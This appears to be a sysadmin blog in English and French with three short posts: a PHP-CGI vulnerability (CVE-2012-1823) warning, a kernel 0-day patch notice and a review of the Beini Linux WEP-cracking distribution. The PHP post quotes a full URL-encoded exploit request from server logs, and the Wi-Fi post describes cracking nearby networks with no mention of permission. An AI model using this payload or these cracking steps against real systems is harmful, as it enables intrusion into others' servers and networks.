Security hole in PHP5.X – CVE-2012-1823

There is a big security hole in PHP5.X (php-cgi) which could be made to execute arbitrary code with the privilege of the web server. There is an public exploit posted on 2013-10-29, and many bots uses it! Security hole was detected in September 2012 and so distributions have already patched php5-cgi package, but if you’re not up-to-date, you’re doomed!

More information :
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
https://security-tracker.debian.org/tracker/CVE-2012-1823
http://www.ubuntu.com/usn/usn-1437-1/

Typical forged request as seen in  Apache logs:

POST /%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

Exploit 0-day Kernel

Ouch ! Un exploit de type 0-day tourne sur le net et permet de devenir root sur une machine (pas besoin de mettre un lien ici, vous le trouverez aisément). Les kernel 2.6.37 à 3.8.8 semble être impactés.

Et voilà le patch : http://git.kernel.org/linus/8176cced706b5e5d15887584150764894e94e02f Juste un typage… !

Debian security l’a patché : https://security-tracker.debian.org/tracker/DSA-2669-1
Ubuntu aussi : http://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-2094.html

Beini Linux – Ou comment cracker un réseau Sans-Fil WEP en 5 minutes.

Beini Linux se présente comme une live-cd très léger (50Mo) et simple d’utilisation, une fois sur le bureau, il vous suffit de lancer le logiciel “FeedingBottle” pour cracker un réseau WiFi de votre choix, d’une facilité déconcertante, scan, choix du SSID, choix du client si attaque via client, type d’attaque, lancez l’attaque ! Laisser mariner 5 minutes et voilà la clé … Et pour ceux qui veulent aller plus loin le bouton avancée permet de peaufiner des réglages 😉

J’en ai profité pour tester mon nouveau matos, adaptateur 2W et Antenne YAGI 20 dBi 🙂 – En gros je capte tout le quartier (si je bouge l’antenne car elle est directionnel), et j’ai assez de puissance pour recevoir assez de paquets, sauf que il n’y à que deux WEP. Heureusement que le WEP est remplacé par du WPA/WPA2 progressivement ! Sinon c’est la porte ouverte à n’importe qui…

En résumé, une petite distribution simple et efficace réservé aux crack de réseau WiFi.